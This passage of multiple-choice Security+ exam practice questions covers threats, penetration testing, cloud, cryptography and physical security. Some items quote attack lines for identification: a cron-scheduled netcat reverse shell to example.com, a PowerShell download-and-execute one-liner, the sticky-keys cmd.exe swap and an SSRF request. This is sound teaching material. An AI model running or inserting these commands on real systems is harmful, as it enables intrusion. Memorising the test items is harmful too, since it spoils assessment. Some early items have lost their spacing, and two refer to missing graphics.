A. TheWindowsregistryandtheLinux/etc/passwdfile

B. TheWindowsSAMandtheLinux/etc/passwdfile

C. TheWindowsSAMandtheLinux/etc/shadowfile

D. TheWindowsregistryandtheLinux/etc/shadowfile

156. WhattypeofattackisanSSLstrippingattack?

A. Abrute-forceattack

B. ATrojanattack

C. Anon-pathattack

D. Adowngradeattack

157. WhattypeofattackistheU.S.TrustedFoundryprogramintendedtohelpprevent?

A. Criticalinfrastructureattacks

B. Metalworkandcastingattacks

C. Supplychainattacks

D. Softwaresourcecodeattacks

Telegram Channel @nettrain

158. Nicolewantstoshowthemanagementinherorganizationreal-timedataaboutattacksfromaroundtheworldviamultipleserviceprovidersinavisualway.Whattypeofthreatintelligencetoolisoftenusedforthispurpose?

A. Apiechart

B. Athreatmap

C. Adarkwebtracker

D. AnOSINTrepository

159. Youhavenoticedthatwheninacrowdedarea,datafromyourcellphoneisstolen.LaterinvestigationshowsaBluetoothconnectiontoyourphone,onethatyoucannotexplain.Whatdescribesthisattack?

A. Bluejacking

B. Bluesnarfing

C. Eviltwin

D. RAT

160. Thetypeandscopeoftesting,clientcontactdetails,howsensitivedatawillbehandled,andthetypeandfrequencyofstatusmeetingsandreportsareallcommonelementsofwhatartifactofapenetrationtest?

A. Theblack-boxoutline

B. Therulesofengagement

C. Thewhite-boxoutline

D. Theclose-outreport

161. AmandaencountersaBashscriptthatrunsthefollowingcommand:

crontab-e0****ncexample.com8989-e/bin/bash

Whatdoesthiscommanddo?

A. Itchecksthetimeeveryhour.

B. Itpullsdatafromexample.comeveryminute.

C. Itsetsupareverseshell.

D. Noneoftheabove

Telegram Channel @nettrain

162. A penetration tester called a help desk staff member at the company that Charles works at and claimed to be a senior executive who needed her password changed immediately due to an important meeting they needed to conduct that would start in a few minutes. The staff member changed the executive's password to a password that the penetration tester provided. What social engineering principle did the penetration tester leverage to accomplish this attack?

A. Intimidation

B. Scarcity

C. Urgency

D. Trust

163. Patrick has subscribed to a commercial threat intelligence feed that is only provided to subscribers who have been vetted and who pay a monthly fee. What industry term is used to refer to this type of threat intelligence?

A. Proprietary threat intelligence

B. OSINT

C. ELINT

D. Corporate threat intelligence

164. What threat hunting concept involves thinking like a malicious actor to help identify indicators of compromise that might otherwise be hidden?

A. Intelligence fusion

B. Maneuver

C. Threat feed analysis

D. Bulletin analysis

165. What type of malicious actor will typically have the least amount of resources available to them?

A. Nation-states

B. Script kiddies

C. Hacktivists

D. Organized crime


166. A SYN flood seeks to overwhelm a system by tying up all the open sessions that it can create. What type of attack is this?

A. A DDoS

B. A resource exhaustion attack

C. An application exploit

D. A vulnerability exploit

167. A penetration tester calls a staff member for her target organization and introduces herself as a member of the IT support team. She asks if the staff member has encountered a problem with their system, then proceeds to ask for details about the individual, claiming she needs to verify that she is talking to the right person. What type of social engineering attack is this?

A. Pretexting

B. A watering hole attack

C. Prepending

D. Shoulder surfing

168. What term describes the use of airplanes or drones to gather network or other information as part of a penetration test or intelligence gathering operation?

A. Droning

B. AirSnarfing

C. Warflying

D. Aerial snooping

169. Gabby wants to protect a legacy platform with known vulnerabilities. Which of the following is not a common option for this?

A. Disconnect it from the network.

B. Place the device behind a dedicated firewall and restrict inbound and outbound traffic.

C. Rely on the outdated OS to confuse attackers.

D. Move the device to a protected VLAN.

170. In the United States, collaborative industry organizations that analyze and share cybersecurity threat information within their industry verticals are known by what term?

A. IRTs

B. ISACs

C. Feedburners

D. Vertical threat feeds

171. After running nmap against a system on a network, Lucca sees that TCP port 23 is open and a service is running on it. What issue should he identify?

A. Low ports should not be open to the Internet.

B. Telnet is an insecure protocol.

C. SSH is an insecure protocol.

D. Ports 1-1024 are well-known ports and must be firewalled.

172. During a penetration test, Cameron gains physical access to a Windows system and uses a system repair disk to copy cmd.exe to the %systemroot%\system32 directory while renaming it sethc.exe. When the system boots, he is able to log in as an unprivileged user, hit the Shift key five times, and open a command prompt with system-level access using sticky keys. What type of attack has he conducted?

A. A Trojan attack

B. A privilege escalation attack

C. A denial-of-service attack

D. A swap file attack

173. Adam wants to describe threat actors using common attributes. Which of the following is not a common attribute used to describe threat actors?

A. Internal/external

B. Resources or funding level

C. Years of experience

D. Intent/motivation

174. Madhuri is concerned about the security of the machine learning algorithms that her organization is deploying. Which of the following options is not a common security precaution for machine learning algorithms?

A. Ensuring the source data is secure and of sufficient quality

B. Requiring a third-party review of all proprietary algorithms

C. Requiring change control and documentation for all changes to the algorithms

D. Ensuring a secure environment for all development, data acquisition, and storage

175. Frank is part of a white team for a cybersecurity exercise. What role will he and his team have?

A. Performing oversight and judging of the exercise

B. Providing full details of the environment to the participants

C. Providing partial details of the environment to the participants

D. Providing defense against the attackers in the exercise

176. Susan receives $10,000 for reporting a vulnerability to a vendor who participates in a program to identify issues. What term is commonly used to describe this type of payment?

A. A ransom

B. A payday

C. A bug bounty

D. A zero-day disclosure

177. Charles sets the permissions on the /etc directory on a Linux system to 777 using the chmod command. If Alex later discovers this, what should he report his finding as?

A. Open or weak permissions

B. Improper file handling

C. A privilege escalation attack

D. None of the above

178. During a penetration test, Kathleen gathers information, including the organization's domain name, IP addresses, employee information, phone numbers, email addresses, and similar data. What is this process typically called?

A. Mapping

B. Footprinting

C. Fingerprinting

D. Aggregation

179. What term is used to describe mapping wireless networks while driving?

A. Wi-driving

B. Traffic testing

C. Wardriving

D. CARINT

180. Fred discovers that the lighting and utility control systems for his company have been overwhelmed by traffic sent to them from hundreds of external network hosts. This has resulted in the lights and utility system management systems not receiving appropriate reporting, and the endpoint devices cannot receive commands. What type of attack is this?

A. A SCADA overflow

B. An operational technology (OT) DDoS

C. A network DDoS

D. An application DDoS

181. Ben runs a vulnerability scan using up-to-date definitions for a system that he knows has a vulnerability in the version of Apache that it is running. The vulnerability scan does not show that issue when he reviews the report. What has Ben encountered?

A. A silent patch

B. A missing vulnerability update

C. A false negative

D. A false positive

182. What type of technique is commonly used by malware creators to change the signature of malware to avoid detection by antivirus tools?

A. Refactoring

B. Cloning

C. Manual source code editing

D. Changing programming languages

183. What term describes a military strategy for political warfare that combines conventional warfare, irregular warfare, and cyberwarfare with fake news, social media influence strategies, diplomatic efforts, and manipulation of legal activities?

A. Social warfare

B. Hybrid warfare

C. Social influence

D. Cybersocial influence campaigns

184. Chris is notified that one of his staff was warned via a text message that the FBI is aware that they have accessed illegal websites. What type of issue is this?

A. A phishing attempt

B. Identity fraud

C. A hoax

D. An invoice scam

185. Sarah is reviewing the logs for her web server and sees an entry flagged for review that includes the following HTTP request:

Check in stock API=http://localhost/admin.php

What type of attack is most likely being attempted?

A. A cross-site scripting attack

B. Server-side request forgery

C. Client-side request forgery

D. SQL injection

186. Angela reviews bulletins and advisories to determine what threats her organization is likely to face. What type of activity is this associated with?

A. Incident response

B. Threat hunting

C. Penetration testing

D. Vulnerability scanning

187. Why do attackers target passwords stored in memory?

A. They are encrypted in memory.

B. They are hashed in memory.

C. They are often in plain text.

D. They are often de-hashed for use.

188. The U.S. Department of Homeland Security (DHS) provides an automated indicator sharing (AIS) service that allows for the federal government and private sector organizations to share threat data in real time. The AIS service uses open source protocols and standards to exchange this information. Which of the following standards does the AIS service use?

A. HTML and HTTPS

B. SFTP and XML

C. STIX and TRIX

D. STIX and TAXII

189. During what phase of a penetration test is information like employee names, phone numbers, and email addresses gathered?

A. Exploitation

B. Establishing persistence

C. Reconnaissance

D. Lateral movement

190. During a penetration test, Angela obtains the uniform of a well-known package delivery service and wears it into the target office. She claims to have a delivery for a C-level employee she knows is there and insists that the package must be signed for by that person. What social engineering technique has she used?

A. Impersonation

B. Whaling

C. A watering hole attack

D. Prepending

191. Nick purchases his network devices through a gray market supplier that imports them into his region without an official relationship with the network device manufacturer. What risk should Nick identify when he assesses his supply chain risk?

A. Lack of vendor support

B. Lack of warranty coverage

C. Inability to validate the source of the devices

D. All of the above

192. Christina wants to identify indicators of attack for XML-based web applications that her organization runs. Where is she most likely to find information that can help her determine whether XML injection is occurring against her web applications?

A. Syslog

B. Web server logs

C. Authentication logs

D. Event logs

193. What can Frank do to determine if he is suffering from a denial-of-service (DoS) attack against his cloud hosting environment?

A. Nothing; cloud services do not provide security tools.

B. Call the cloud service provider to have them stop the DoS attack.

C. Review the cloud service provider's security tools and enable logging and anti-DoS tools if they exist.

D. Call the cloud service provider's Internet service provider (ISP) and ask them to enable DoS prevention.

194. Frank is using the cloud hosting service's web publishing service rather than running his own web servers. Where will Frank need to look to review his logs to see what types of traffic his application is creating?

A. Syslog

B. Apache logs

C. The cloud service's web logs

D. None of the above

195. If Frank were still operating in his on-site infrastructure, which of the following technologies would provide the most insight into what type of attack he was seeing?

A. A firewall

B. An IPS

C. A vulnerability scanner

D. Antimalware software

196. Alaina wants to ensure that the on-site system integration performed by a vendor that her company is working with is done in accordance with industry best practices. Which of the following is not a common method of ensuring this?

A. Inserting security requirements into contracts

B. Auditing configurations

C. Coordinating with the vendor for security reviews during and after installation

D. Requiring an SOC report

197. Elias has implemented an AI-based network traffic analysis tool that requires him to allow the tool to monitor his network for a period of two weeks before being put into full production. What is the most significant concern he needs to address before using the AI's baselining capabilities?

A. The network should be isolated to prevent outbound traffic from being added to the normal traffic patterns.

B. Compromised or otherwise malicious machines could be added to the baseline, resulting in tainted training data.

C. Traffic patterns may not match traffic throughout a longer time frame.

D. The AI may not understand the traffic flows in his network.

198. What is the typical intent or goal of hacktivists?

A. Increasing their reputation

B. Financial gain

C. Making a political statement

D. Gathering high-value data

199. Where does the information for predictive analysis for threat intelligence come from?

A. Current security trends

B. Large security datasets

C. Behavior patterns

D. All of the above

200. Social Security numbers and other personal information are often stolen for what purpose?

A. Blackmail

B. Tailgating

C. Identity fraud

D. Impersonation

201. Security orchestration, automation, and response (SOAR) tools have three major components. Which of the following is not one of those components?

A. Source code security analysis and testing

B. Threat and vulnerability management

C. Security incident response

D. Security operations automation

202. Direct access, wireless, email, supply chain, social media, removable media, and cloud are all examples of what?

A. Threat intelligence sources

B. Threat vectors

C. Attributes of threat actors

D. Vulnerabilities


203. SourceForge and GitHub are both examples of what type of threat intelligence source?

A. The dark web

B. Automated indicator sharing sources

C. File or code repositories

D. Public information sharing centers

204. What is the root cause of improper input handling?

A. Improper error handling

B. Trusting rather than validating data inputs

C. Lack of user awareness

D. Improper source code review

205. Claire discovers the following PowerShell script. What does it do?

powershell.exe -ep Bypass -nop -noexit -c iex ((New-Object Net.WebClient).DownloadString('https://example.com/file.ps1'))

A. Downloads a file and opens a remote shell

B. Uploads a file and deletes the local copy

C. Downloads a file into memory

D. Uploads a file from memory

206. Kathleen's IPS flags traffic from two IP addresses as shown here:

Source IP: 10.11.94.111
http://example.com/home/show.php?SESSIONID=a3fghbby

Source IP: 192.168.5.34
http://example.com/home/show.php?SESSIONID=a3fghbby

What type of attack should she investigate this as?

A. A SQL injection attack

B. A cross-site scripting attack

C. A session replay attack

D. A server-side request forgery attack

207. There are seven impact categories that you need to know for the Security+ exam. Which of the following is not one of them?

A. Data breaches

B. Data modification

C. Data exfiltration

D. Data loss

208. Which of the following research sources is typically the least timely when sourcing threat intelligence?

A. Vulnerability feeds

B. Local industry groups

C. Academic journals

D. Threat feeds

209. While reviewing auth logs on a server that she maintains, Megan notices the following log entries:

Apr 26 20:01:32 examplesys rshd[6101]: Connection from 10.0.2.15 on illegal port
Apr 26 20:01:48 examplesys rshd[6117]: Connection from 10.0.2.15 on illegal port
Apr 26 20:02:02 examplesys rshd[6167]: Connection from 10.0.2.15 on illegal port
Apr 26 20:02:09 examplesys rshd[6170]: Connection from 10.0.2.15 on illegal port
Apr 26 20:02:09 examplesys rshd[6172]: Connection from 10.0.2.15 on illegal port
Apr 26 20:02:35 examplesys rshd[6188]: Connection from 10.0.2.15 on illegal port
Apr 26 20:02:35 examplesys rlogind[6189]: Connection from 10.0.2.15 on illegal port

What has she most likely detected?

A. A successful hacking attempt

B. A failed service startup

C. A vulnerability scan

D. A system reboot

210. The following graphic shows a report from an OpenVAS vulnerability scan. What should Charles do first to determine the best fix for the vulnerability shown?

A. Disable PHP-CGI.

B. Upgrade PHP to version 5.4.

C. Review the vulnerability descriptions in the CVEs listed.

D. Disable the web server.

211. Ian runs a vulnerability scan, which notes that a service is running on TCP port 8080. What type of service is most likely running on that port?

A. SSH

B. RDP

C. MySQL

D. HTTP

212. Rick runs WPScan against a potentially vulnerable WordPress installation. WPScan is a web application security scanner designed specifically for WordPress sites. As part of the scan results, he notices the following entry:

What should Rick do after remediating this vulnerability?

A. Install a web application firewall.

B. Review the patching and updating process for the WordPress system.

C. Search for other compromised systems.

D. Review IPS logs for attacks against the vulnerable plug-in.

213. Carolyn runs a vulnerability scan of a network device and discovers that the device is running services on TCP ports 22 and 443. What services has she most likely discovered?

A. Telnet and a web server

B. FTP and a Windows file share

C. SSH and a web server

D. SSH and a Windows file share

214. Ryan needs to verify that no unnecessary ports and services are available on his systems, but he cannot run a vulnerability scanner. What is his best option?

A. Passive network traffic capture to detect services

B. A configuration review

C. Active network traffic capture to detect services

D. Log review

215. Why is improper error handling for web applications that results in displaying error messages considered a vulnerability that should be remediated?

A. Errors can be used to crash the system.

B. Many errors result in race conditions that can be exploited.

C. Many errors provide information about the host system or its configuration.

D. Errors can change system permissions.

216. Some users on your network use Acme Bank for their personal banking. Those users have all recently been the victim of an attack, in which they visited a fake Acme Bank website and their logins were compromised. They all visited the bank website from your network, and all of them insist they typed in the correct URL. What is the most likely explanation for this situation?

A. Trojan horse

B. IP spoofing

C. Clickjacking

D. DNS poisoning

217. John is a network administrator for Acme Company. He has discovered that someone has registered a domain name that is spelled just one letter different than his company's domain. The website with the misspelled URL is a phishing site. What best describes this attack?

A. Session hijacking

B. Cross-site request forgery

C. Typosquatting

D. Clickjacking


Chapter 2: Architecture and Design

THE COMPTIA SECURITY+ EXAM SY0-601 TOPICS COVERED IN THIS CHAPTER INCLUDE THE FOLLOWING:

2.1 Explain the importance of security concepts in an enterprise environment

2.2 Summarize virtualization and cloud computing concepts

2.3 Summarize secure application development, deployment, and automation concepts

2.4 Summarize authentication and authorization design concepts

2.5 Given a scenario, implement cybersecurity resilience

2.6 Explain the security implications of embedded and specialized systems

2.7 Explain the importance of physical security controls

2.8 Summarize the basics of cryptographic concepts

1. Ben is reviewing configuration management documentation for his organization and finds the following diagram in his company's document repository. What key information is missing from the diagram that a security professional would need to build firewall rules based on the diagram?

A. The subnet mask

B. The service name

C. The protocol the traffic uses

D. The API key

2. You are responsible for network security at an e-commerce company. You want to ensure that you are using best practices for the e-commerce website your company hosts. What standard would be the best for you to review?

A. OWASP

B. NERC

C. Trusted Foundry

D. ISA/IEC

3. Cheryl is responsible for cybersecurity at a mid-sized insurance company. She has decided to use a different vendor for network antimalware than she uses for host antimalware. Is this a recommended action, and why or why not?

A. This is not recommended; you should use a single vendor for a particular security control.

B. This is recommended; this is described as vendor diversity.

C. This is not recommended; this is described as vendor forking.

D. It is neutral. This does not improve or detract from security.

4. Scott wants to back up the contents of a network-attached storage (NAS) device used in a critical department in his company. He is concerned about how long it would take to restore the device if a significant failure happened, and he is less concerned about the ability to recover in the event of a natural disaster. Given these requirements, what type of backup should he use for the NAS?

A. A tape-based backup with daily full backups

B. A second NAS device with a full copy of the primary NAS

C. A tape-based backup with nightly incremental backups

D. A cloud-based backup service that uses high durability near-line storage

5. Yasmine is responding to a full data center outage, and after referencing the documentation for the systems in the data center she brings the network back up, then focuses on the storage area network (SAN), followed by the database servers. Why does her organization list systems for her to bring back online in a particular series?

A. The power supply for the building cannot handle all the devices starting at once.

B. The organization wants to ensure that a second outage does not occur due to failed systems.

C. The organization wants to ensure that systems are secure and have the resources they need by following a restoration order.

D. The fire suppression system may activate due to the sudden change in heat, causing significant damage to the systems.

6. Enrique is concerned about backup data being infected by malware. The company backs up key servers to digital storage on a backup server. Which of the following would be most effective in preventing the backup data being infected by malware?

A. Place the backup server on a separate VLAN.

B. Air-gap the backup server.

C. Place the backup server on a different network segment.

D. Use a honeynet.

7. What type of attribute is a Windows picture password?

A. Somewhere you are

B. Something you exhibit

C. Something you can do

D. Someone you know

8. Which of the following is not a critical characteristic of a hash function?

A. It converts variable-length input into a fixed-length output.

B. Multiple inputs should not hash to the same output.

C. It must be reversible.

D. It should be fast to compute.


9. Naomi wants to hire a third-party secure data destruction company. What process is most frequently used to ensure that third parties properly perform data destruction?

A. Manual on-site inspection by federal inspectors

B. Contractual requirements and a certification process

C. Requiring pictures of every destroyed document or device

D. All of the above

10. Olivia wants to ensure that the code executed as part of her application is secure from tampering and that the application itself cannot be tampered with. Which of the following solutions should she use and why?

A. Server-side execution and validation, because it prevents data and application tampering

B. Client-side validation and server-side execution to ensure client data access

C. Server-side validation and client-side execution to prevent data tampering

D. Client-side execution and validation, because it prevents data and application tampering

11. Trevor wants to use an inexpensive device to build a custom embedded system that can monitor a process. Which of the following options is best suited for this if he wants to minimize expense and maximize simplicity while avoiding the potential for system or device compromise?

A. A Raspberry Pi

B. A custom FPGA

C. A repurposed desktop PC

D. An Arduino

12. Amanda wants to use a digital signature on an email she is sending to Maria. Which key should she use to sign the email?

A. Maria's public key

B. Amanda's public key

C. Maria's private key

D. Amanda's private key

13. Nick wants to make an encryption key harder to crack, and he increases the key length by one bit from a 128-bit encryption key to a 129-bit encryption key as an example to explain the concept. How much more work would an attacker have to do to crack the key using brute force if no other attacks or techniques could be applied?

A. One more

B. 129 more

C. Twice as much

D. Four times as much

14. Gurvinder knows that the OpenSSL passwd file protects passwords by using 1,000 rounds of MD5 hashing to help protect password information. What is this technique called?

A. Spinning the hash

B. Key rotation

C. Key stretching

D. Hash iteration

15. Fred wants to make it harder for an attacker to use rainbow tables to attack the hashed password values he stores. What should he add to every password before it is hashed to make it impossible for the attacker to simply use a list of common hashed passwords to reveal the passwords Fred has stored if they gain access to them?

A. A salt

B. A cipher

C. A spice

D. A trapdoor

16. Ian wants to send an encrypted message to Michelle using public key cryptography. What key does he need to encrypt the message?

A. His public key

B. His private key

C. Her public key

D. Her private key

17. What key advantage does an elliptical curve cryptosystem have over an RSA-based cryptosystem?

A. It can use a smaller key length for the same resistance to being broken.

B. It requires only a single key to encrypt and decrypt.

C. It can run on older processors.

D. It can be used for digital signatures as well as encryption.

18. What cryptographic capability ensures that even if the server's private key is compromised, the session keys will not be compromised?

A. Perfect forward secrecy

B. Symmetric encryption

C. Quantum key rotation

D. Diffie-Hellman key modulation

19. Alaina is reviewing practices for her reception desk and wants to ensure that the reception desk's visitor log is accurate. What process should she add to the guard's check-in procedure?

A. Check the visitor's ID against their logbook entry.

B. Perform a biometric scan to validate visitor identities.

C. Require two-person integrity control.

D. Replace the guard with a security robot.

20. In an attempt to observe hacker techniques, a security administrator configures a nonproduction network to be used as a target so that he can covertly monitor network attacks. What is this type of network called?

A. Active detection

B. False subnet

C. IDS

D. Honeynet

21. What type of system is used to control and monitor power plant power generation systems?

A. IPG

B. SEED

C. SCADA

D. ICD

22. What major technical component of modern cryptographic systems is likely to be susceptible to quantum attacks?

A. Key generation

B. Elliptical plot algorithms

C. Cubic root curve cryptography

D. Prime factorization algorithms

23. Geoff wants to establish a contract with a company to have data center space that is equipped and ready to go so that he can bring his data to the location in the event of a disaster. What type of disaster recovery site is he looking for?

A. A hot site

B. A cold site

C. A warm site

D. An RTO site

24. Olivia needs to ensure an IoT device does not have its operating system modified by third parties after it is sold. What solution should she implement to ensure that this does not occur?

A. Set a default password.

B. Require signed and encrypted firmware.

C. Check the MD5 sum for new firmware versions.

D. Patch regularly.

25. What statement is expected to be true for a post-quantum cryptography world?

A. Encryption speed will be measured in qubits.

B. Nonquantum cryptosystems will no longer be secure.

C. Quantum encryption will no longer be relevant.

D. Key lengths longer than 4,096 bits using RSA will be required.

26. What function does counter mode perform in a cryptographic system?

A. It reverses the encryption process.

B. It turns a block cipher into a stream cipher.

C. It turns a stream cipher into a block cipher.

D. It allows public keys to unlock private keys.

27. Which of the following items is not included in a blockchain's public ledger?

A. A record of all genuine transactions between network participants

B. A record of cryptocurrency balances (or other data) stored in the blockchain

C. The identity of the blockchain participants

D. A token that identifies the authority under which the transaction was made

28. Suzan is responsible for application development in her company. She wants to have all web applications tested before they are deployed live. She wants to use a test system that is identical to the live server. What is this called?

A. A production server

B. A development server

C. A test server

D. A predeployment server

29. Alexandra is preparing to run automated security tests against the code that developers in her organization have completed. Which environment is she most likely to run them in if the next step is to deploy the code to production?

A. Development

B. Test

C. Staging

D. Production

30. Chris wants to limit who can use an API that his company provides and be able to log usage of the API uniquely to each organization that they provide access to. What solution is most often used to do this?

A. Firewalls with rules for each company's public IP address

B. User credentials for each company

C. API keys

D. API passwords

31. Derek has been assigned to assess the security of smart meters. Which of the following is not a common concern for an embedded system like a smart meter?

A. Eavesdropping

B. Denial of service

C. Remote disconnection

D. SQL injection

32. Selah wants to analyze real-world attack patterns against systems similar to what she already has deployed in her organization. She would like to see local commands on a compromised system and have access to any tools or other materials the attackers would normally deploy. What type of technology could she use to do this?

A. A honeypot

B. An IPS

C. An IDS

D. A WAF

33. Charles sets up a network with intentional vulnerabilities and then instruments it so that he can watch attackers and capture details of their attacks and techniques. What has Charles set up?

A. A black hole

B. A honey hole

C. A spynet

D. A honeynet

34. Maria is a security engineer with a manufacturing company. During a recent investigation, she discovered that an engineer's compromised workstation was being used to connect to SCADA systems while the engineer was not logged in. The engineer is responsible for administering the SCADA systems and cannot be blocked from connecting to them. What should Maria do to mitigate this threat?

A. Install host-based antivirus software on the engineer's system.

B. Implement account usage auditing on the SCADA system.

C. Implement an NIPS on the SCADA system.

D. Use FDE on the engineer's system.

35. AES and DES are an example of what type of cipher?

A. Stream ciphers that encrypt groups of plain-text symbols all together

B. Block ciphers that encrypt groups of plain-text symbols all together

C. Stream ciphers that encrypt one plain-text symbol at a time

D. Block ciphers that encrypt one plain-text symbol at a time

36. Gerard is responsible for secure communications with his company's e-commerce server. All communications with the server use TLS. What is the most secure option for Gerard to store the private key on the e-commerce server?

A. HSM

B. FDE

C. SED

D. SDN

37. What purpose does a transit gateway serve in cloud services?

A. It connects systems inside of a cloud data center.

B. It connects virtual private clouds and on-premises networks.

C. It provides an API gateway between trust zones.

D. It allows multicloud infrastructure designs.


38. Web developers in your company currently have direct access to the production server and can deploy code directly to it. This can lead to unsecure code, or simply code flaws, being deployed to the live system. What would be the best change you could make to mitigate this risk?

A. Implement sandboxing.

B. Implement virtualized servers.

C. Implement a staging server.

D. Implement deployment policies.

39. Ian is concerned about VoIP phones used in his organization due to the use of SMS as part of their multifactor authentication rollout. What type of attack should he be concerned about?

A. A vishing attack

B. A voicemail hijack

C. An SMS token redirect

D. A weak multifactor code injection

40. Angela wants to ensure that IoT devices in her organization have a secure configuration when they are deployed and that they are ready for further configuration for their specific purposes. What term is used to describe these standard configurations used as part of her configuration management program?

A. A baseline configuration

B. An essential settings list

C. A preinstall checklist

D. A setup guide

41. Why is heating, ventilation, and air-conditioning (HVAC) part of organizational security planning?

A. Attackers often use HVAC systems as part of social engineering exercises.

B. HVAC systems are important for availability.

C. HVAC systems are a primary line of network defense.

D. None of the above

42. What advantage does symmetric encryption have over asymmetric encryption?

A. It is more secure.

B. It is faster.

C. It can use longer keys.

D. It simplifies key distributions.

43. Laura knows that predictability is a problem in pseudo-random number generators (PRNGs) used for encryption operations. What term describes the measure of uncertainty used in a PRNG?

A. Ellipses

B. Quantum flux

C. Entropy

D. Primeness

44. Which cloud service model gives the consumer the ability to use applications provided by the cloud provider over the Internet?

A. SaaS

B. PaaS

C. IaaS

D. Hybrid

45. Chris sets a resource policy in his cloud environment. What type of control does this allow him to exert?

A. It allows him to determine how much disk space can be used.

B. It allows him to determine how much bandwidth can be used.

C. It allows him to specify who has access to resources and what actions they can perform on it.

D. It allows him to specify what actions a resource can take on specific users.

46. Chris sets up SAN replication for his organization. What has he done?

A. He has enabled RAID 1 to ensure that the SAN cannot lose data if a drive fails because the drives are replicated.

B. He has set up backups to a tape library for the SAN to ensure data resilience.

C. He has built a second identical set of hardware for his SAN.

D. He has replicated the data on one SAN to another at the block or hardware level.

47. Mike is a security analyst and has just removed malware from a virtual server. What feature of virtualization would he use to return the virtual server to a last known good state?

A. Sandboxing

B. Hypervisor

C. Snapshot

D. Elasticity

48. Lisa is concerned about fault tolerance for her database server. She wants to ensure that if any single drive fails, it can be recovered. What RAID level would support this goal while using distributed parity bits?

A. RAID 0

B. RAID 1

C. RAID 3

D. RAID 5

49. Jarod is concerned about EMI affecting a key escrow server. Which method would be most effective in mitigating this risk?

A. VLAN

B. SDN

C. Trusted platform module

D. Faraday cage

50. John is responsible for physical security at his company. He is particularly concerned about an attacker driving a vehicle into the building. Which of the following would provide the best protection against this threat?

A. A gate

B. Bollards

C. A security guard on duty

D. Security cameras

51. Mark is responsible for cybersecurity at a small college. There are many computer labs that are open for students to use. These labs are monitored only by a student worker, who may or may not be very attentive. Mark is concerned about the theft of computers. Which of the following would be the best way for him to mitigate this threat?

A. Cable locks

B. FDE on the lab computers

C. Strong passwords on the lab computers

D. Having a lab sign-in sheet

52. Joanne is responsible for security at a power plant. The facility is very sensitive and security is extremely important. She wants to incorporate two-factor authentication with physical security. What would be the best way to accomplish this?

A. Smart cards

B. A mantrap with a smart card at one door and a PIN keypad at the other door

C. A mantrap with video surveillance

D. A fence with a smart card gate access

53. Which of the following terms refers to the process of establishing a standard for security?

A. Baselining

B. Security evaluation

C. Hardening

D. Normalization

54. Angela configures a honeypot to report ongoing events like user logins and logouts, disk usage, program and script loads, and similar information. What is this type of deception called?

A. Fake telemetry

B. User emulation

C. Honeyfakes

D. Deepfakes

55. Which level of RAID is a “stripe of mirrors”?

A. RAID 1+0

B. RAID 6

C. RAID 0

D. RAID 1

56. Isabella is responsible for database management and security. She is attempting to remove redundancy in the database. What is this process called?

A. Integrity checking

B. Deprovisioning

C. Baselining

D. Normalization

57. Gary wants to implement an AAA service. Which of the following services should he implement?

A. OpenID

B. LDAP

C. RADIUS

D. SAML

58. Where does TLS/SSL inspection happen, and how does it occur?

A. On the client, using a proxy

B. On the server, using a protocol analyzer

C. At the certificate authority, by validating a request for a TLS certificate

D. Between the client and server by intercepting encrypted communications

59. Diana wants to prevent drones from flying over her organization's property. What can she do?

A. Deploy automated drone take-down systems that will shoot the drones down.

B. Deploy radio frequency jamming systems to disrupt the drone's control frequencies.

C. Contact the FAA to get her company's property listed as a no-fly zone.

D. None of the above

60. Isaac has configured an infrastructure-as-code-based cloud environment that relies on code-defined system builds to spin up new systems as the services they run need to scale horizontally. An attacker discovers a vulnerability and exploits a system in the cluster, but it is shut down and terminated before they can perform a forensic analysis. What term describes this type of environment?

A. Forensic-resistant

B. Nonpersistent

C. Live-boot

D. Terminate and stay resident

61. You are responsible for database security at your company. You are concerned that programmers might pass badly written SQL commands to the database, or that an attacker might exploit badly written SQL in applications. What is the best way to mitigate this threat?

A. Formal code inspection

B. Programming policies

C. Agile programming

D. Stored procedures

62. Joanna's company has adopted multiple software-as-a-service (SaaS) tools and now wants to better coordinate them so that the data that they each contain can be used in multiple services. What type of solution should she recommend if she wants to minimize the complexity of long-term maintenance for her organization?

A. Replace the SaaS service with a platform-as-a-service (PaaS) environment to move everything to a single platform.

B. Build API-based integrations using in-house expertise.

C. Adopt an integration platform to leverage scalability.

D. Build flat-file integrations using in-house expertise.

63. Farès is responsible for managing the many virtual machines on his company's networks. Over the past two years, the company has increased the number of virtual machines significantly. Farès is no longer able to effectively manage the large number of machines. What is the term for this situation?

A. VM overload

B. VM sprawl

C. VM spread

D. VM zombies

64. Mary is responsible for virtualization management in her company. She is concerned about VM escape. Which of the following methods would be the most effective in mitigating this risk?

A. Only share resources between the VM and host if absolutely necessary.

B. Keep the VM patched.

C. Use a firewall on the VM.

D. Use host-based antimalware on the VM.

65. Irene wants to use a cloud service for her organization that does not require her to do any coding or system administration, and she wants to do minimal configuration to perform the tasks that her organization needs to accomplish. What type of cloud service is she most likely looking for?

A. SaaS

B. PaaS

C. IaaS

D. IDaaS

66. Which of the following is not an advantage of a serverless architecture?

A. It does not require a system administrator.

B. It can scale as function call frequency increases.

C. It can scale as function call frequency decreases.

D. It is ideal for complex applications.

67. You are responsible for server room security for your company. You are concerned about physical theft of the computers. Which of the following would be best able to detect theft or attempted theft?

A. Motion sensor–activated cameras

B. Smart card access to the server rooms

C. Strong deadbolt locks for the server rooms

D. Logging everyone who enters the server room

68. Alexandra wants to prevent systems that are infected with malware from connecting to a botnet controller that she knows the hostnames for. What type of solution can she implement to prevent the systems from reaching the controller?

A. An IDS

B. A round-robin DNS

C. A DNS sinkhole

D. A WAF

69. Hector is using infrared cameras to verify that servers in his datacenter are being properly racked. Which of the following datacenter elements is he concerned about?

A. EMI blocking

B. Humidity control

C. Hot and cold aisles

D. UPS failover

70. Gerald is concerned about unauthorized people entering the company's building. Which of the following would be most effective in preventing this?

A. Alarm systems

B. Fencing

C. Cameras

D. Security guards

71. Which of the following is the most important benefit from implementing SDN?

A. It will stop malware.

B. It provides scalability.

C. It will detect intrusions.

D. It will prevent session hijacking.

72. Mark is an administrator for a healthcare company. He has to support an older, legacy application. He is concerned that this legacy application might have vulnerabilities that would affect the rest of the network. What is the most efficient way to mitigate this?

A. Use an application container.

B. Implement SDN.

C. Run the application on a separate VLAN.

D. Insist on an updated version of the application.

73. Charles is performing a security review of an internally developed web application. During his review, he notes that the developers who wrote the application have made use of third-party libraries. What risks should he note as part of his review?

A. Code compiled with vulnerable third-party libraries will need to be recompiled with patched libraries.

B. Libraries used via code repositories could become unavailable, breaking the application.

C. Malicious code could be added without the developers knowing it.

D. All of the above

74. Valerie is considering deploying a cloud access security broker. What sort of tool is she looking at?

A. A system that implements mandatory access control on cloud infrastructure

B. A tool that sits between cloud users and applications to monitor activity and enforce policies

